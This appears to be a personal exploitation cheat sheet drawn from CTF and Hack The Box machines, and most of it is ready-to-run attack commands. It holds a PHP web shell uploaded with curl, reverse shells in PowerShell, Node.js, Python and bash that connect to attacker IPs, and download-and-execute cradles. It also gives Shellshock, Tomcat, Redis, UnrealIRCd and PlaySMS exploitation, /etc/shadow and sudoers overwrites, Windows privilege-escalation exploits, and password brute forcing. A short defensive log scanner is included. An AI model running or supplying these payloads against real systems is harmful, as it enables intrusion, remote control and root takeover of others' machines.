
Exploitation



CTF --> pwnable.kr

1) Binary Exploitation Basics

2) Binary Exploit

3) Online Hash Decrypter -- NTLM/WPA/PDF..

4) XSS Payloads

Put a file using CURL:

curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://10.10.10.10/test/shell.php

Brute Force SSH (patator, https://github.com/lanjelot/patator.git):

patator ssh_login host=10.10.10.76 port=22 user=someone password=FILE0 0=probable-v2-top1575.txt persistent=0

Brute Forcing id_rsa using JohnTheRipper:

sshng2john id_rsa > hash.txt        # convert the encrypted key into a hash john can read
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
chmod 600 id_rsa                    # ssh refuses a private key whose permissions are too open

ssh -i id_rsa bhanu@10.10.10.10
Bruteforcing using Hashcat:

hashcat --example-hashes        # lists all example hashes; pick the matching mode and pass it with -m
cewl 10.10.10.46 > wordlist.txt # create a word list from the files/words/links available on the web page
Windows Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.6",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Windows Payload: metasploit 

msfvenom -a x86 --platform windows -p CMD="powershell \"IEX (New-Object Net.Webclient).DownloadString('http://SERVER/script.ps1')\"" -e x86/unicode_mixed lhost=10.10.10.74 lport=9001 -b '----------------------payload-------------' BufferRegister=EAX -f python 
Upload a Shell to the Target:

powershell.exe -exec bypass -Command "& {Import-Module .\script.ps1; Invoke-CMDLET | Out-File -Encoding ascii file.txt}"

or

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://HOST/script.ps1'); Invoke-CMDLET | Out-File -Encoding ascii file.txt"

Example: Drupal Exploit

-> Exploit-DB; a modified version is also in /root/Downloads/exploits/drupal. Affected versions: < 7.58, < 8.3.9, < 8.4.6, < 8.5.1

1) Run the exploit

2) go to http://website.com/bhanu.php?cmd=whoami

3) http://website.com/bhanu.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33:8001/rev.ps1') | powershell -noprofile -        # get a reverse shell
Brute Forcing ZIP Files:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt something.zip

Working with the Python Console:

import os
os.popen("whoami").read()

os.popen("find /etc | grep iptables").read()                 # locate the firewall rules to see which ports can be reached for a reverse shell
os.popen("base64 -w 0 /etc/iptables/rules.v4").read()        # read files as base64; check which ports are allowed

os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.0.0.1 1234 >/tmp/f").read()     # UDP reverse shell

nc -u -nvlp 1234     # UDP listener for the shell (on the attacking machine)
Exploiting Apache Tomcat:

http://IP_ADDRESS:8080/manager/html/

login with default credentials --> tomcat/tomcat

upload a war file as a reverse shell

For Windows: msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.48 LPORT=9001 -f war -o tomcat.war

For Linux: msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.48 LPORT=9001 -f war -o tom.war

Extract the war file --> look for some_random_name.jsp

nc -nvlp 9001

http://IP_ADDRESS:8080/tom/some_random_name.jsp

Get your reverse shell on nc :)


Method II

# Creating a reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f war > shell.war

# Uploading the shell using curl
curl -u 'tomcat':'PASSWORD' -T shell.war 'http://10.10.10.10:8080/manager/text/deploy?path=/shells'

# List deployed applications
curl -u 'tomcat':'PASSWORD' http://10.10.10.10:8080/manager/text/list

# Triggering the reverse shell
curl -u 'tomcat':'PASSWORD' http://10.10.10.10:8080/shells/

Method III

tomcatWarDeployer.py -U tomcat -P tomcat -H KALI_IP -p PORT 10.10.10.10:8080

Tomcat Exploit < 9.0.31

Path Traversal: https://10.10.10.10/manager/status/..;/html


Kibana Local File Inclusion < 6.4.3 & 5.6.13

Upload a Node.js reverse shell via Elasticsearch or any other method, then include it through the API path below.

Node.js Reverse Shell:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js


Reference: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/

Exploiting web.config: add the following code at the end of the web.config file, upload it to the server and use it to get a reverse shell. The reverse shell should be in the winrevshell.ps1 file, and a file-sharing server must be running to serve it.

<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.6:8001/winrevshell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Exploiting MongoDB - HTB Node

find creds in app.js
example: mongodb://username:password@localhost:port/.......=DEFAULT&authSource=databasename';

mongo -p -u username DBName

db.TableName.insert({"cmd" : "cp /bin/dash /tmp/file; chmod 6755 /bin/dash;chmod u+s /tmp/file"})           # creating a SUID copy of dash
db.TableName.find()

/tmp/file -p                     # run the SUID copy with privileges (-p keeps the effective uid)
Exploiting Haraka < 2.8.9

Exploit --> Available Here

Change the port number if required on line 123

./haraka.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.10\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t penelope@redcross.htb -f penelope@redcross.htb -m redcross

Exploiting a CGI-bin Vulnerability: Shellshock

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.5/9001 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh
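Added defensive example, not code from the original page: a small log scanner that parses combined-format web server access logs and flags both the Shellshock function-definition header shown above and the Tomcat "..;/" manager path-traversal request from the Tomcat section. The log lines are constructed samples, and the field layout assumes the standard Apache/nginx combined format.

```python
import re

# Apache/nginx "combined" access-log format:
# host ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shellshock trigger: a bash function definition "() {" smuggled into a header;
# matching only the prefix, with optional whitespace, covers the common variants.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# Tomcat normalisation bypass: a "..;/" segment used to reach /manager/html.
TOMCAT_TRAVERSAL_RE = re.compile(r'\.\.;/')

# Constructed sample lines (not real traffic); the first two mimic the page's requests.
SAMPLE_LOG = [
    '10.10.14.5 - - [10/Oct/2020:13:55:36 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 512 '
    '"-" "() { :; }; echo; /usr/bin/id"',
    '10.10.14.5 - - [10/Oct/2020:13:56:01 +0000] "GET /manager/status/..;/html HTTP/1.1" '
    '200 1423 "-" "Mozilla/5.0"',
    '192.0.2.7 - - [10/Oct/2020:13:57:12 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def parse_line(line):
    # Named fields of one combined-format line, or None if the line does not parse.
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry):
    # Names of the signatures that fire on one parsed entry.
    findings = []
    # Shellshock rides in any header bash sees; combined logs keep two of them.
    if SHELLSHOCK_RE.search(entry["agent"]) or SHELLSHOCK_RE.search(entry["referer"]):
        findings.append("shellshock-header")
    if TOMCAT_TRAVERSAL_RE.search(entry["path"]):
        findings.append("tomcat-path-traversal")
    return findings

def scan(lines):
    # Parse each line and keep only entries that trigger at least one signature.
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # malformed or non-combined line: skip rather than crash
        findings = classify(entry)
        if findings:
            alerts.append({"host": entry["host"], "path": entry["path"], "findings": findings})
    return alerts
```

Running scan(SAMPLE_LOG) returns two alerts, one per attack line, and nothing for the ordinary request.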
  
Exploiting Redis server

ssh-keygen
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
redis-cli -h 10.10.10.10 -p 6379
redis-cli -h 10.10.10.10 -p 6379 flushall
cat foo.txt | redis-cli -h 10.10.10.160 -p 6379 -x set crackit
redis-cli -h 10.10.10.10 -p 6379          # then, at the redis prompt:

config get dir
config set dir /var/lib/redis/.ssh/
config set dbfilename "authorized_keys"
save
Exploiting UnrealIRCd

ncat 10.10.10.117 8067          # IRC connection opens
PASS somepass
NICK somenickname
USER username hostname servername :realname     # we can see the IRC server talking to us

echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.4/9002 0>&1'" | nc 10.10.10.117 8067     # in a new terminal

ncat -lvnp 9002                 # listener on the port used above; shell opens
pspy for Solaris (poll the process list and print what appeared or disappeared):

#!/bin/bash

# Loop by line
IFS=$'\n'

old_process=$(ps -eo args -o pid)

while true; do
        new_process=$(ps -eo args -o pid)
        # print only added (>) or removed (<) lines, ignoring our own ps invocations
        diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]' | grep -v "ps -eo args"
        sleep .1
        old_process=$new_process
done
Exploiting PlaySMS 1.4 - Exploit

Get login creds and login

go to http://192.168.227.140/SecreTSMSgatwayLogin/index.php?app=main&inc=feature_sendfromfile&op=list

Create the payload: save the payload as the upload file and upload it
<?php system('echo "bash -i >& /dev/tcp/192.168.227.135/443 0>&1"> /tmp/shell'); ?>,2,3

edit the file and upload it again
<?php system('chmod +x /tmp/shell'); ?>,2,3

edit the file and upload it again
<?php system('bash -c /tmp/shell'); ?>,2,3

Get the shell on nc -nvlp 443
PHP Functions for Pentest:

scandir("/home")

file_get_contents("/root/root.txt")

file_put_contents("/root/root.txt", "Enter whatever you want to paste in root.txt - you can even append data to it by adding FILE_APPEND", FILE_APPEND)
 
wpscan -u http://website.com --enumerate t --enumerate p     # enumerate themes (t) and plugins (p) on a WordPress site; --enumerate u lists usernames

wpscan -u http://10.10.10.46 --username UserName --wordlist /root/Desktop/list.txt     # brute-force a WordPress username with a password list

use exploit/unix/webapp/wp_admin_shell_upload     # Metasploit module: upload a shell when you know the username and password

If find has the SUID bit set, this command changes the root password to 1234:
find . -exec sed -Ei 's/^(root\:)\*(.*)/\1\$6\$ZbvneNDSEXXO4pk1\$DmvtdGOHZA8mbpVih5xtHrBcKk8VxZ0rXwLEK2M1iciGvM6qHXfuSY5YosPHj3Zv063JUX2p1TQqya4k1Azjx0\2/' /etc/shadow \;
su root          # password: 1234
 
SeImpersonatePrivilege or SeCreateGlobalPrivilege Enabled Exploit

Juicy Potato Exploit (64-bit and x86 versions; look up the CLSID for the target OS)

jp86.exe -l 1336 -p c:\windows\system32\cmd.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}

Worked for Windows 7 Professional --> {6d18ad12-bde3-4393-b311-099c346e6df9}
SeLoadDriverPrivilege Enabled

need a driver: download Capcom.sys onto the target machine

Download the exploit https://github.com/TarlogicSecurity/EoPLoadDriver/ and execute it

https://github.com/tandasat/ExploitCapcom --> download the exploit

create a file with a reverse shell:
echo nc.exe 10.10.10.10 9001 -e cmd.exe > shell.bat

.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService Capcom.sys

.\ExploitCapcom

If Perl got Root Permissions:

sudo /usr/bin/perl -e 'exec "/bin/sh"'

Get Root Using OpenSSL which got capabilities: read root files

getcap openssl     # this should show "ep"

openssl enc -in "/etc/passwd"

openssl enc -in "/root/root.txt"

Getting a shell using OpenSSL

./openssl enc -in /etc/sudoers > sudoers

vi sudoers                      # add the line below to the sudoers file, after "root ALL=(ALL) ALL"
Username  ALL=(ALL)  ALL

cat ./sudoers | ./openssl enc -out /etc/sudoers

SSH: no matching key exchange method found:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
